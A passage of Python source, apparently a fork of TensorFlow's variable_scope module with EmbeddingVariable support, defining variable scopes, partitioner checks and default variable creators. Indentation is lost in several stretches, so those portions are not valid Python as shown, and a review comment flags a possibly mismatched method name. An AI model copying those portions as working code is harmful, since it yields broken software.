partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
old_name_scope: the original name scope when re-entering a variable scope.
dtype: type of the variables within this scope (defaults to `DT_FLOAT`).
use_resource: If False, variables in this scope will be regular Variables.
If True, experimental ResourceVariables will be creates instead, with
well-defined semantics. Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
"""
self._name_or_scope = name_or_scope
self._reuse = reuse
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._old_name_scope = old_name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
self._var_store = _get_default_variable_store()
self._var_scope_store = get_variable_scope_store()
self._last_variable_scope_object = None
if isinstance(self._name_or_scope, VariableScope):
self._new_name = self._name_or_scope.name
name_scope = self._name_or_scope._name_scope # pylint: disable=protected-access
# Handler for the case when we jump to a shared scope. We create a new
# VariableScope (self._var_scope_object) that contains a copy of the
# provided shared scope, possibly with changed reuse and initializer, if
# the user requested this.
variable_scope_object = VariableScope(
self._name_or_scope.reuse if not self._reuse else self._reuse,
name=self._new_name,
initializer=self._name_or_scope.initializer,
regularizer=self._name_or_scope.regularizer,
caching_device=self._name_or_scope.caching_device,
partitioner=self._name_or_scope.partitioner,
dtype=self._name_or_scope.dtype,
custom_getter=self._name_or_scope.custom_getter,
name_scope=name_scope,
use_resource=self._name_or_scope.use_resource,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._name_or_scope.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._cached_variable_scope_object = variable_scope_object
def __enter__(self):
"""Begins the scope block.
Returns:
A VariableScope.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope, or if reuse is not `None` or `True`.
TypeError: when the types of some arguments are not appropriate.
"""
self._old = self._var_scope_store.current_scope
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.open_variable_scope(self._new_name)
self._old_subscopes = copy.copy(
self._var_scope_store.variable_scopes_count)
variable_scope_object = self._cached_variable_scope_object
else:
# Handler for the case when we just prolong current variable scope.
# VariableScope with name extended by the provided one, and inherited
# reuse and initializer (except if the user provided values to set).
self._new_name = (
self._old.name + "/" +
self._name_or_scope if self._old.name else self._name_or_scope)
self._reuse = (self._reuse or
self._old.reuse) # Re-using is inherited by sub-scopes.
if self._old_name_scope is None:
name_scope = self._name_or_scope
else:
name_scope = self._old_name_scope
variable_scope_object = VariableScope(
self._reuse,
name=self._new_name,
initializer=self._old.initializer,
regularizer=self._old.regularizer,
caching_device=self._old.caching_device,
partitioner=self._old.partitioner,
dtype=self._old.dtype,
use_resource=self._old.use_resource,
custom_getter=self._old.custom_getter,
name_scope=name_scope,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._old.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._var_scope_store.open_variable_scope(self._new_name)
self._var_scope_store.current_scope = variable_scope_object
self._last_variable_scope_object = variable_scope_object
return variable_scope_object
  def __exit__(self, type_arg, value_arg, traceback_arg):
    """Exits the pure variable scope, restoring the previous scope state.

    Raises:
      RuntimeError: if scopes were closed out of order (the store's current
        scope is not the one this context manager installed on __enter__).
    """
    # Sanity check: the scope we installed must still be the current one,
    # otherwise enters/exits were interleaved incorrectly.
    if (self._var_scope_store.current_scope is
        not self._last_variable_scope_object):
      raise RuntimeError("Improper nesting of variable_scope.")
    # If jumping out from a non-prolonged scope, restore counts.
    if isinstance(self._name_or_scope, VariableScope):
      # Re-entered a premade VariableScope: restore the sub-scope usage
      # counts snapshot taken on __enter__.
      self._var_scope_store.variable_scopes_count = self._old_subscopes
    else:
      # Prolonged the current scope by a string name: drop counters for
      # everything created underneath the extended name.
      self._var_scope_store.close_variable_subscopes(self._new_name)
    self._var_scope_store.current_scope = self._old
def _maybe_wrap_custom_getter(custom_getter, old_getter):
"""Wrap a call to a custom_getter to use the old_getter internally."""
if old_getter is None:
return custom_getter
# The new custom_getter should call the old one
def wrapped_custom_getter(getter, *args, **kwargs):
# Call:
# custom_getter(
# lambda: old_getter(true_getter, ...), *args, **kwargs)
# which means custom_getter will call old_getter, which
# will call the true_getter, perform any intermediate
# processing, and return the results to the current
# getter, which will also perform additional processing.
return custom_getter(functools.partial(old_getter, getter), *args, **kwargs)
return wrapped_custom_getter
def _get_unique_variable_scope(prefix):
  """Get a name with the given prefix unique in the current variable scope."""
  store = get_variable_scope_store()
  scope = get_variable_scope()
  # Fully qualify the prefix with the current scope's name, if any.
  qualified = scope.name + "/" + prefix if scope.name else prefix
  if store.variable_scope_count(qualified) == 0:
    return prefix
  # Probe "_1", "_2", ... until an unused suffix is found; note the returned
  # name is the *unqualified* prefix plus suffix.
  suffix = 1
  while store.variable_scope_count("%s_%d" % (qualified, suffix)) > 0:
    suffix += 1
  return "%s_%d" % (prefix, suffix)
# Named like a function for backwards compatibility with the
# @tf_contextlib.contextmanager version, which was switched to a class to avoid
# some object creation overhead.
@tf_export(v1=["variable_scope"])  # pylint: disable=invalid-name
class variable_scope(object):
  """A context manager for defining ops that creates variables (layers).

  This context manager validates that the (optional) `values` are from the same
  graph, ensures that graph is the default graph, and pushes a name scope and a
  variable scope.

  If `name_or_scope` is not None, it is used as is. If `name_or_scope` is None,
  then `default_name` is used. In that case, if the same name has been
  previously used in the same scope, it will be made unique by appending `_N`
  to it.

  Variable scope allows you to create new variables and to share already created
  ones while providing checks to not create or share by accident. For details,
  see the [Variable Scope How To](https://tensorflow.org/guide/variables), here
  we present only a few basic examples.

  Simple example of how to create a new variable:

  ```python
  with tf.compat.v1.variable_scope("foo"):
      with tf.compat.v1.variable_scope("bar"):
          v = tf.compat.v1.get_variable("v", [1])
          assert v.name == "foo/bar/v:0"
  ```

  Simple example of how to reenter a premade variable scope safely:

  ```python
  with tf.compat.v1.variable_scope("foo") as vs:
    pass

  # Re-enter the variable scope.
  with tf.compat.v1.variable_scope(vs,
                                   auxiliary_name_scope=False) as vs1:
    # Restore the original name_scope.
    with tf.name_scope(vs1.original_name_scope):
        v = tf.compat.v1.get_variable("v", [1])
        assert v.name == "foo/v:0"
        c = tf.constant([1], name="c")
        assert c.name == "foo/c:0"
  ```

  Basic example of sharing a variable AUTO_REUSE:

  ```python
  def foo():
    with tf.compat.v1.variable_scope("foo", reuse=tf.compat.v1.AUTO_REUSE):
      v = tf.compat.v1.get_variable("v", [1])
    return v

  v1 = foo()  # Creates v.
  v2 = foo()  # Gets the same, existing v.
  assert v1 == v2
  ```

  Basic example of sharing a variable with reuse=True:

  ```python
  with tf.compat.v1.variable_scope("foo"):
      v = tf.compat.v1.get_variable("v", [1])
  with tf.compat.v1.variable_scope("foo", reuse=True):
      v1 = tf.compat.v1.get_variable("v", [1])
  assert v1 == v
  ```

  Sharing a variable by capturing a scope and setting reuse:

  ```python
  with tf.compat.v1.variable_scope("foo") as scope:
      v = tf.compat.v1.get_variable("v", [1])
      scope.reuse_variables()
      v1 = tf.compat.v1.get_variable("v", [1])
  assert v1 == v
  ```

  To prevent accidental sharing of variables, we raise an exception when getting
  an existing variable in a non-reusing scope.

  ```python
  with tf.compat.v1.variable_scope("foo"):
      v = tf.compat.v1.get_variable("v", [1])
      v1 = tf.compat.v1.get_variable("v", [1])
      #  Raises ValueError("... v already exists ...").
  ```

  Similarly, we raise an exception when trying to get a variable that does not
  exist in reuse mode.

  ```python
  with tf.compat.v1.variable_scope("foo", reuse=True):
      v = tf.compat.v1.get_variable("v", [1])
      #  Raises ValueError("... v does not exists ...").
  ```

  Note that the `reuse` flag is inherited: if we open a reusing scope, then all
  its sub-scopes become reusing as well.

  A note about name scoping: Setting `reuse` does not impact the naming of other
  ops such as mult. See related discussion on
  [github#6189](https://github.com/tensorflow/tensorflow/issues/6189)

  Note that up to and including version 1.0, it was allowed (though explicitly
  discouraged) to pass False to the reuse argument, yielding undocumented
  behaviour slightly different from None. Starting at 1.1.0 passing None and
  False as reuse has exactly the same effect.

  A note about using variable scopes in multi-threaded environment: Variable
  scopes are thread local, so one thread will not see another thread's current
  scope. Also, when using `default_name`, unique scopes names are also generated
  only on a per thread basis. If the same name was used within a different
  thread, that doesn't prevent a new thread from creating the same scope.
  However, the underlying variable store is shared across threads (within the
  same graph). As such, if another thread tries to create a new variable with
  the same name as a variable created by a previous thread, it will fail unless
  reuse is True.

  Further, each thread starts with an empty variable scope. So if you wish to
  preserve name prefixes from a scope from the main thread, you should capture
  the main thread's scope and re-enter it in each thread. For e.g.

  ```
  main_thread_scope = variable_scope.get_variable_scope()

  # Thread's target function:
  def thread_target_fn(captured_scope):
    with variable_scope.variable_scope(captured_scope):
      # .... regular code for this thread


  thread = threading.Thread(target=thread_target_fn, args=(main_thread_scope,))
  ```
  """

  def __init__(self,
               name_or_scope,
               default_name=None,
               values=None,
               initializer=None,
               regularizer=None,
               caching_device=None,
               partitioner=None,
               custom_getter=None,
               reuse=None,
               dtype=None,
               use_resource=None,
               constraint=None,
               auxiliary_name_scope=True):
    """Initialize the context manager.

    Args:
      name_or_scope: `string` or `VariableScope`: the scope to open.
      default_name: The default name to use if the `name_or_scope` argument is
        `None`, this name will be uniquified. If name_or_scope is provided it
        won't be used and therefore it is not required and can be None.
      values: The list of `Tensor` arguments that are passed to the op function.
      initializer: default initializer for variables within this scope.
      regularizer: default regularizer for variables within this scope.
      caching_device: default caching device for variables within this scope.
      partitioner: default partitioner for variables within this scope.
      custom_getter: default custom getter for variables within this scope.
      reuse: `True`, None, or tf.compat.v1.AUTO_REUSE; if `True`, we go into
        reuse mode for this scope as well as all sub-scopes; if
        tf.compat.v1.AUTO_REUSE, we create variables if they do not exist, and
        return them otherwise; if None, we inherit the parent scope's reuse
        flag. When eager execution is enabled, new variables are always created
        unless an EagerVariableStore or template is currently active.
      dtype: type of variables created in this scope (defaults to the type in
        the passed scope, or inherited from parent scope).
      use_resource: If False, all variables will be regular Variables. If True,
        experimental ResourceVariables with well-defined semantics will be used
        instead. Defaults to False (will later change to True). When eager
        execution is enabled this argument is always forced to be True.
      constraint: An optional projection function to be applied to the variable
        after being updated by an `Optimizer` (e.g. used to implement norm
        constraints or value constraints for layer weights). The function must
        take as input the unprojected Tensor representing the value of the
        variable and return the Tensor for the projected value (which must have
        the same shape). Constraints are not safe to use when doing asynchronous
        distributed training.
      auxiliary_name_scope: If `True`, we create an auxiliary name scope with
        the scope. If `False`, we don't create it. Note that the argument is not
        inherited, and it only takes effect for once when creating. You should
        only use it for re-entering a premade variable scope.

    Returns:
      A scope that can be captured and reused.

    Raises:
      ValueError: when trying to reuse within a create scope, or create within
        a reuse scope.
      TypeError: when the types of some arguments are not appropriate.
    """
    self._name_or_scope = name_or_scope
    self._default_name = default_name
    self._values = values
    self._initializer = initializer
    self._regularizer = regularizer
    self._caching_device = caching_device
    self._partitioner = partitioner
    self._custom_getter = custom_getter
    self._reuse = reuse
    self._dtype = dtype
    self._use_resource = use_resource
    self._constraint = constraint
    if self._default_name is None and self._name_or_scope is None:
      raise TypeError("If default_name is None then name_or_scope is required")
    if self._reuse is False:
      # We don't allow non-inheriting scopes, False = None here.
      self._reuse = None
    if not (self._reuse is True
            or self._reuse is None
            or self._reuse is AUTO_REUSE):
      raise ValueError("The reuse parameter must be True or False or None.")
    if self._values is None:
      self._values = []
    self._in_graph_mode = not context.executing_eagerly()
    if self._in_graph_mode:
      self._graph = ops._get_graph_from_inputs(self._values)  # pylint: disable=protected-access
    # Caches the pure variable scope across __enter__ calls so re-entering the
    # same context manager is cheap (see __enter__).
    self._cached_pure_variable_scope = None
    self._current_name_scope = None
    if not isinstance(auxiliary_name_scope, bool):
      raise TypeError("The auxiliary_name_scope must be `True` or `False`, "
                      "while get {}".format(auxiliary_name_scope))
    self._auxiliary_name_scope = auxiliary_name_scope

  def _get_custom_getter(self, dtype):
    """Returns a custom getter that this class's methods must be called under.

    All methods of this class must be called under a variable scope that was
    passed this custom getter. Example:

    ```python
    network = ConvNetBuilder(...)
    with tf.compat.v1.variable_scope('cg',
                                     custom_getter=network.get_custom_getter()):
      network.conv(...)
      # Call more methods of network here
    ```

    Currently, this custom getter only does anything if self.use_tf_layers is
    True. In that case, it causes variables to be stored as dtype
    self.variable_type, then casted to the requested dtype, instead of directly
    storing the variable as the requested dtype.
    """

    def inner_custom_getter(getter, *args, **kwargs):
      """Custom getter that forces variables to have type self.variable_type."""
      cast_to_bfloat16 = False
      requested_dtype = kwargs['dtype']
      if requested_dtype == dtypes.bfloat16:
        # Only change the variable dtype if doing so does not decrease variable
        # precision.
        kwargs['dtype'] = dtype
        cast_to_bfloat16 = True
      var = getter(*args, **kwargs)
      # This if statement is needed to guard the cast, because batch norm
      # assigns directly to the return value of this custom getter. The cast
      # makes the return value not a variable so it cannot be assigned. Batch
      # norm variables are always in fp32 so this if statement is never
      # triggered for them.
      if cast_to_bfloat16:
        # Name the cast op after the variable when possible ("<var>/cast").
        index = var.name.rfind(':')
        if index != -1:  # found
          cast_name = var.name[:index] + '/cast'
          var = math_ops.cast(var, dtypes.bfloat16, name=cast_name)
        else:
          var = math_ops.cast(var, dtypes.bfloat16)
      return var

    return inner_custom_getter

  def keep_weights(self, dtype=dtypes.float32):
    """Scope class for bfloat16 variables so that the model uses custom getter.

    This enables variables to be read as bfloat16 type when using get_variable.

    ```python
    import tensorflow as tf
    from tensorflow.contrib import layers

    with tf.variable_scope(...).keep_weights(dtype=tf.float32):
      data_bf16 = tf.cast(data, dtype=tf.bfloat16)
      matmul_0 = tf.layers.dense(data_bf16, 64, activation=tf.nn.relu)
      matmul_0 = tf.layers.batch_normalization(matmul_0, training=True)
      matmul_0 = tf.cast(matmul_0, dtype=tf.float32)
      matmul_1 = layers.fully_connected(data_bf16, 128,
                                        activation_fn=tf.nn.leaky_relu)
      matmul_1 = tf.cast(matmul_1, dtype=tf.float32)
    ```
    """
    # NOTE(review): overwrites any custom_getter supplied at construction;
    # returns self so it can be used fluently in a `with` statement.
    self._custom_getter = self._get_custom_getter(dtype=dtype)
    return self

  def __enter__(self):
    # If the default graph is building a function, then we should not replace it
    # with the cached graph.
    if ops.get_default_graph().building_function:
      self._building_function = True
    else:
      self._building_function = False
    if self._in_graph_mode and not self._building_function:
      self._graph_context_manager = self._graph.as_default()
      self._graph_context_manager.__enter__()
    if self._cached_pure_variable_scope is not None:
      # Fast path for re-entering variable_scopes. We've held on to the pure
      # variable scope from a previous successful __enter__, so we avoid some
      # overhead by re-using that object.
      if self._current_name_scope is not None:
        self._current_name_scope.__enter__()
      return self._cached_pure_variable_scope.__enter__()

    try:
      return self._enter_scope_uncached()
    except:
      # Undo the graph context entered above before propagating, so a failed
      # __enter__ leaves no context leaked.
      if (self._in_graph_mode and not self._building_function and
          self._graph_context_manager is not None):
        self._graph_context_manager.__exit__(*sys.exc_info())
      raise

  def _enter_scope_uncached(self):
    """Enters the context manager when there is no cached scope yet.

    Returns:
      The entered variable scope.

    Raises:
      TypeError: A wrong type is passed as `scope` at __init__().
      ValueError: `reuse` is incorrectly set at __init__().
    """
    if self._auxiliary_name_scope:
      # Create a new name scope later
      current_name_scope = None
    else:
      # Reenter the current name scope
      name_scope = ops.get_name_scope()
      if name_scope:
        # Hack to reenter
        name_scope += "/"
        current_name_scope = ops.name_scope(name_scope)
      else:
        # Root scope
        current_name_scope = ops.name_scope(name_scope)

    # IMPORTANT: Only assign to self._cached_pure_variable_scope and
    # self._current_name_scope after successful __enter__() calls.
    if self._name_or_scope is not None:
      if not isinstance(self._name_or_scope,
                        (VariableScope,) + six.string_types):
        raise TypeError("VariableScope: name_or_scope must be a string or "
                        "VariableScope.")
      if isinstance(self._name_or_scope, six.string_types):
        name_scope = self._name_or_scope
      else:
        name_scope = self._name_or_scope.name.split("/")[-1]
      if name_scope or current_name_scope:
        current_name_scope = current_name_scope or ops.name_scope(name_scope)
        try:
          current_name_scope_name = current_name_scope.__enter__()
        except:
          current_name_scope.__exit__(*sys.exc_info())
          raise
        self._current_name_scope = current_name_scope
        if isinstance(self._name_or_scope, six.string_types):
          old_name_scope = current_name_scope_name
        else:
          old_name_scope = self._name_or_scope.original_name_scope
        pure_variable_scope = _pure_variable_scope(
            self._name_or_scope,
            reuse=self._reuse,
            initializer=self._initializer,
            regularizer=self._regularizer,
            caching_device=self._caching_device,
            partitioner=self._partitioner,
            custom_getter=self._custom_getter,
            old_name_scope=old_name_scope,
            dtype=self._dtype,
            use_resource=self._use_resource,
            constraint=self._constraint)
        try:
          entered_pure_variable_scope = pure_variable_scope.__enter__()
        except:
          pure_variable_scope.__exit__(*sys.exc_info())
          raise
        self._cached_pure_variable_scope = pure_variable_scope
        return entered_pure_variable_scope
      else:
        self._current_name_scope = None
        # This can only happen if someone is entering the root variable scope.
        pure_variable_scope = _pure_variable_scope(
            self._name_or_scope,
            reuse=self._reuse,
            initializer=self._initializer,
            regularizer=self._regularizer,
            caching_device=self._caching_device,
            partitioner=self._partitioner,
            custom_getter=self._custom_getter,
            dtype=self._dtype,
            use_resource=self._use_resource,
            constraint=self._constraint)
        try:
          entered_pure_variable_scope = pure_variable_scope.__enter__()
        except:
          pure_variable_scope.__exit__(*sys.exc_info())
          raise
        self._cached_pure_variable_scope = pure_variable_scope
        return entered_pure_variable_scope
    else:  # Here name_or_scope is None. Using default name, but made unique.
      if self._reuse:
        raise ValueError("reuse=True cannot be used without a name_or_scope")
      current_name_scope = current_name_scope or ops.name_scope(
          self._default_name)
      try:
        current_name_scope_name = current_name_scope.__enter__()
      except:
        current_name_scope.__exit__(*sys.exc_info())
        raise
      self._current_name_scope = current_name_scope
      unique_default_name = _get_unique_variable_scope(self._default_name)
      pure_variable_scope = _pure_variable_scope(
          unique_default_name,
          initializer=self._initializer,
          regularizer=self._regularizer,
          caching_device=self._caching_device,
          partitioner=self._partitioner,
          custom_getter=self._custom_getter,
          old_name_scope=current_name_scope_name,
          dtype=self._dtype,
          use_resource=self._use_resource,
          constraint=self._constraint)
      try:
        entered_pure_variable_scope = pure_variable_scope.__enter__()
      except:
        pure_variable_scope.__exit__(*sys.exc_info())
        raise
      self._cached_pure_variable_scope = pure_variable_scope
      return entered_pure_variable_scope

  def __exit__(self, type_arg, value_arg, traceback_arg):
    # Unwind in reverse order of __enter__: pure variable scope, then the
    # auxiliary name scope, then the graph context. try/finally guarantees the
    # outer contexts are exited even if an inner __exit__ raises.
    try:
      self._cached_pure_variable_scope.__exit__(type_arg, value_arg,
                                                traceback_arg)
    finally:
      try:
        if self._current_name_scope:
          self._current_name_scope.__exit__(type_arg, value_arg,
                                            traceback_arg)
      finally:
        if self._in_graph_mode and not self._building_function:
          self._graph_context_manager.__exit__(type_arg, value_arg,
                                               traceback_arg)
# pylint: disable=g-doc-return-or-yield
@tf_export(v1=["variable_op_scope"])
@tf_contextlib.contextmanager
def variable_op_scope(values,
                      name_or_scope,
                      default_name=None,
                      initializer=None,
                      regularizer=None,
                      caching_device=None,
                      partitioner=None,
                      custom_getter=None,
                      reuse=None,
                      dtype=None,
                      use_resource=None,
                      constraint=None):
  """Deprecated: context manager for defining an op that creates variables."""
  logging.warn("tf.variable_op_scope(values, name, default_name) is deprecated,"
               " use tf.variable_scope(name, default_name, values)")
  # Forward everything to variable_scope; only the argument order differs
  # between the two APIs.
  scope_kwargs = dict(
      default_name=default_name,
      values=values,
      initializer=initializer,
      regularizer=regularizer,
      caching_device=caching_device,
      partitioner=partitioner,
      custom_getter=custom_getter,
      reuse=reuse,
      dtype=dtype,
      use_resource=use_resource,
      constraint=constraint)
  with variable_scope(name_or_scope, **scope_kwargs) as scope:
    yield scope
def _call_partitioner(partitioner, shape, dtype):
  """Call partitioner validating its inputs/output.

  Args:
    partitioner: a function mapping `Tensor` shape and dtype to a list of
      partitions.
    shape: shape of the `Tensor` to partition; must be fully defined and have
      rank at least 1 (that is what the checks below enforce).
    dtype: dtype of the elements in the `Tensor`.

  Returns:
    A list with elements >=1 and exactly one >1. The index of that
    element corresponds to the partitioning axis.

  Raises:
    ValueError: if `shape` is not fully defined or has rank 0, or if the
      partitioner's output is not a valid single-axis partitioning of `shape`.
  """
  if not shape.is_fully_defined():
    raise ValueError("Shape of a new partitioned variable must be "
                     "fully defined, but instead was %s." % (shape,))
  if shape.ndims < 1:
    raise ValueError("A partitioned Variable must have rank at least 1, "
                     "shape: %s" % shape)

  slicing = partitioner(shape=shape, dtype=dtype)
  if not isinstance(slicing, collections_lib.Sequence):
    raise ValueError("Partitioner must return a sequence, but saw: %s" %
                     slicing)
  if len(slicing) != shape.ndims:
    raise ValueError(
        "Partitioner returned a partition list that does not match the "
        "Variable's rank: %s vs. %s" % (slicing, shape))
  if any(p < 1 for p in slicing):
    raise ValueError("Partitioner returned zero partitions for some axes: %s" %
                     slicing)
  if sum(p > 1 for p in slicing) > 1:
    raise ValueError("Can only slice a variable along one dimension: "
                     "shape: %s, partitioning: %s" % (shape, slicing))
  return slicing
# TODO(slebedev): could be inlined, but
# `_VariableStore._get_partitioned_variable` is too complex even
# without this logic.
def _get_slice_dim_and_num_slices(slicing):
"""Get slicing dimension and number of slices from the partitioner output."""
for slice_dim, num_slices in enumerate(slicing):
if num_slices > 1:
break
else:
# Degenerate case: no partitioning applied.
slice_dim = 0
num_slices = 1
return slice_dim, num_slices
def _iter_slices(full_shape, num_slices, slice_dim):
  """Slices a given shape along the specified dimension.

  Yields (offset, shape) pairs for each slice; the first
  `full_shape[slice_dim] % num_slices` slices carry one extra element so the
  whole axis is covered.
  """
  base_len, excess = divmod(full_shape[slice_dim], num_slices)
  offset = [0] * len(full_shape)
  for i in xrange(num_slices):
    piece = full_shape[:]
    piece[slice_dim] = base_len + (1 if i < excess else 0)
    # Yield a snapshot of the running offset; the list itself is mutated below.
    yield offset[:], piece
    offset[slice_dim] += piece[slice_dim]
def default_variable_creator(next_creator=None, **kwargs):
  """Default variable creator.

  Terminal creator in the variable-creator chain. Dispatches on
  `use_resource` / `invalid_key`:
    * `ResourceVariable` when resource variables are in effect and no
      `invalid_key` is supplied;
    * `EmbeddingVariable` (or a `DynamicEmbeddingVariable` composed of
      several block EmbeddingVariables) when `invalid_key` is supplied;
    * `RefVariable` otherwise.

  Args:
    next_creator: must be None; this creator terminates the chain.
    **kwargs: variable construction arguments (initial_value, trainable,
      collections, name, dtype, shape, evconfig, ...).

  Returns:
    A `ResourceVariable`, `EmbeddingVariable`, `DynamicEmbeddingVariable`, or
    `RefVariable` as described above.
  """
  assert next_creator is None
  initial_value = kwargs.get("initial_value", None)
  trainable = kwargs.get("trainable", None)
  collections = kwargs.get("collections", None)
  validate_shape = kwargs.get("validate_shape", True)
  caching_device = kwargs.get("caching_device", None)
  name = kwargs.get("name", None)
  variable_def = kwargs.get("variable_def", None)
  dtype = kwargs.get("dtype", None)
  # Fixed: a trailing comma here used to wrap the value in a 1-tuple, which
  # was then silently compensated for with `embedding_block_num[0]` below.
  embedding_block_num = kwargs.get("embedding_block_num", None)
  expected_shape = kwargs.get("expected_shape", None)
  import_scope = kwargs.get("import_scope", None)
  constraint = kwargs.get("constraint", None)
  use_resource = kwargs.get("use_resource", None)
  synchronization = kwargs.get("synchronization", None)
  aggregation = kwargs.get("aggregation", None)
  shape = kwargs.get("shape", None)
  invalid_key = kwargs.get("invalid_key", None)
  evconfig = kwargs.get("evconfig", None)
  initializer = kwargs.get("embedding_initializer", None)
  ht_partition_num = kwargs.get("ht_partition_num", None)

  # Resolve use_resource: explicit arg > current scope > global default;
  # eager execution always forces resource variables.
  if use_resource is None:
    use_resource = get_variable_scope().use_resource
  if use_resource is None:
    use_resource = _DEFAULT_USE_RESOURCE
  use_resource = use_resource or context.executing_eagerly()

  if use_resource and invalid_key is None:
    distribute_strategy = kwargs.get("distribute_strategy", None)
    return resource_variable_ops.ResourceVariable(
        initial_value=initial_value,
        trainable=trainable,
        collections=collections,
        validate_shape=validate_shape,
        caching_device=caching_device,
        name=name,
        dtype=dtype,
        constraint=constraint,
        variable_def=variable_def,
        import_scope=import_scope,
        distribute_strategy=distribute_strategy,
        synchronization=synchronization,
        aggregation=aggregation,
        shape=shape)
  elif use_resource and invalid_key is not None:
    # Was `embedding_block_num[0]` to unwrap the accidental tuple (see above).
    emb_blocknum = embedding_block_num
    if emb_blocknum is None:
      # Single (non-blocked) embedding variable.
      ev = kv_variable_ops.EmbeddingVariable(
          initial_value=initial_value, trainable=trainable,
          collections=collections, validate_shape=validate_shape,
          caching_device=caching_device, name=name, dtype=dtype,
          constraint=constraint, variable_def=variable_def,
          import_scope=import_scope, invalid_key=invalid_key,
          evconfig=evconfig,
          initializer=initializer, ht_partition_num=ht_partition_num)
      if evconfig.init_data_source is not None:
        ev.set_init_data_source_initializer(evconfig.init_data_source)
      return ev
    else:
      # Blocked embedding: one primary EmbeddingVariable ("/block0") plus
      # emb_blocknum - 1 slave blocks colocated with it, wrapped in a
      # DynamicEmbeddingVariable.
      evconfig.block_num = emb_blocknum
      evlist = []
      block_evconfig = copy.copy(evconfig)
      block_evconfig.handle_name = name
      block_evconfig.emb_index = 0
      primary_ev = kv_variable_ops.EmbeddingVariable(
          initial_value=initial_value, trainable=trainable,
          collections=collections, validate_shape=validate_shape,
          caching_device=caching_device, name=name + "/block0", dtype=dtype,
          constraint=constraint, variable_def=variable_def,
          import_scope=import_scope, invalid_key=invalid_key,
          evconfig=block_evconfig,
          initializer=initializer, ht_partition_num=ht_partition_num)
      if evconfig.init_data_source is not None:
        primary_ev.set_init_data_source_initializer(evconfig.init_data_source)
      evlist.append(primary_ev)
      block_evconfig.primary = primary_ev
      with ops.colocate_with(primary_ev):
        block_evconfig.handle_name = primary_ev._block_handle_name
        for i in range(emb_blocknum - 1):
          slave_evconfig = copy.copy(block_evconfig)
          slave_evconfig.emb_index = i + 1
          slave_evconfig.primary_slotnum_op = primary_ev._slotnum_op
          slave_ev = kv_variable_ops.EmbeddingVariable(
              initial_value=initial_value, trainable=trainable,
              collections=collections, validate_shape=validate_shape,
              caching_device=caching_device, name=name + "/block" + str(i + 1), dtype=dtype,
              constraint=constraint, variable_def=variable_def,
              import_scope=import_scope, invalid_key=invalid_key,
              evconfig=slave_evconfig,
              initializer=initializer, ht_partition_num=ht_partition_num)
          if evconfig.init_data_source is not None:
            # NOTE(review): slaves call `_set_init_data_source_initializer`
            # (leading underscore) while the primary/single paths call
            # `set_init_data_source_initializer` — verify which name the
            # EmbeddingVariable API actually exposes.
            slave_ev._set_init_data_source_initializer(evconfig.init_data_source)
          evlist.append(slave_ev)
        dyn_ev = kv_variable_ops.DynamicEmbeddingVariable(name, evlist)
        return dyn_ev
  else:
    return variables.RefVariable(
        initial_value=initial_value,
        trainable=trainable,
        collections=collections,
        validate_shape=validate_shape,
        caching_device=caching_device,
        name=name,
        dtype=dtype,
        constraint=constraint,
        variable_def=variable_def,
        expected_shape=expected_shape,
        import_scope=import_scope,
        synchronization=synchronization,
        aggregation=aggregation,
        shape=shape)
def default_variable_creator_v2(next_creator=None, **kwargs):
  """Default variable creator."""
  assert next_creator is None
  # Terminal v2 creator: forward the supported keyword arguments straight
  # into a ResourceVariable. Unknown kwargs are ignored.
  get = kwargs.get
  return resource_variable_ops.ResourceVariable(
      initial_value=get("initial_value", None),
      trainable=get("trainable", None),
      validate_shape=get("validate_shape", True),
      caching_device=get("caching_device", None),
      name=get("name", None),
      dtype=get("dtype", None),
      constraint=get("constraint", None),
      variable_def=get("variable_def", None),
      import_scope=get("import_scope", None),
      distribute_strategy=get("distribute_strategy", None),
      synchronization=get("synchronization", None),
      aggregation=get("aggregation", None),
      shape=get("shape", None))
# Install the creators defined above on the `variables` module; presumably the
# Variable constructors dispatch to these attributes — verify in `variables`.
variables.default_variable_creator = default_variable_creator
variables.default_variable_creator_v2 = default_variable_creator_v2
def _make_getter(captured_getter, captured_previous):
"""Gets around capturing loop variables in python being broken."""
return lambda **kwargs: captured_getter(captured_previous, **kwargs)
# TODO(apassos) remove forwarding symbol
# Backwards-compatibility alias: `variable` forwards to variables.VariableV1.
variable = variables.VariableV1
@tf_export(v1=["variable_creator_scope"])
@tf_contextlib.contextmanager
def variable_creator_scope_v1(variable_creator):
  """Scope which defines a variable creation function to be used by variable().

  variable_creator is expected to be a function with the following signature:

  ```
    def variable_creator(next_creator, **kwargs)
  ```

  The creator is supposed to eventually call the next_creator to create a
  variable if it does want to create a variable and not call Variable or
  ResourceVariable directly. This helps make creators composable. A creator may
  choose to create multiple variables, return already existing variables, or
  simply register that a variable was created and defer to the next creators in
  line. Creators can also modify the keyword arguments seen by the next
  creators.

  Custom getters in the variable scope will eventually resolve down to these
  custom creators when they do create variables.

  The valid keyword arguments in kwds are:

      initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
